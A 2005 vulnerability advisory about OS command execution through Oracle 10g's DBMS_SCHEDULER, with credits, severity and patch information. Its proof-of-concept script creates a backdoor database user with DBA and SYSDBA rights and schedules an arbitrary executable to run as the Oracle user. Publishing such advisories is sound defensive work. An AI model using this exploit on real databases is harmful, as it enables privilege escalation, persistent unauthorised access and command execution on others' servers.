Name OS command execution via Oracle DBMS_SCHEDULER in Oracle 10g
Systems Affected Oracle 10g
Severity High Risk
Category OS command execution
Vendor URL http://www.oracle.com/
Credit Pete Finnigan of Pete Finnigan Ltd. in conjunction with Jonathan Gennick of O'Reilly and Alexander Kornbrust of Red-Database-Security GmbH
Exploit http://dba.5341.com/msg/34053.html
Date 01 May 2005 (V 1.01)
Details
The following proof of concept exploit code allows any user with CREATE JOB privileges to execute OS commands in the context of the user Oracle.
Example
#!/bin/ksh
set -a
echo "Operator, are you pondering what I am pondering? " >/dev/console
ORAENV_ASK=NO
ORACLE_SID= <sid >
. /usr/local/bin/oraenv
sqlplus "/ as sysdba " < <EOF
create user brain identified by takeover default tablespace system;
grant connect,resource,dba to brain;
grant sysdba to brain;
EOF
BEGIN
DBMS_SCHEDULER.CREATE_PROGRAM (
program_name = > 'take_over_the_world ',
program_action = > '/tmp/pinky_and_the_brain ',
program_type = > 'EXECUTABLE ',
comments = > 'I rulez ');
END;
/
Patch Information
This bug is fixed after applying the patchset for Oracle alert 68 or later patchsets.
References
Pete Finnigan's Security Advisotry - Bug in dbms_scheduler
© 2005 by Red-Database-Security GmbH - last update 1-may-2005
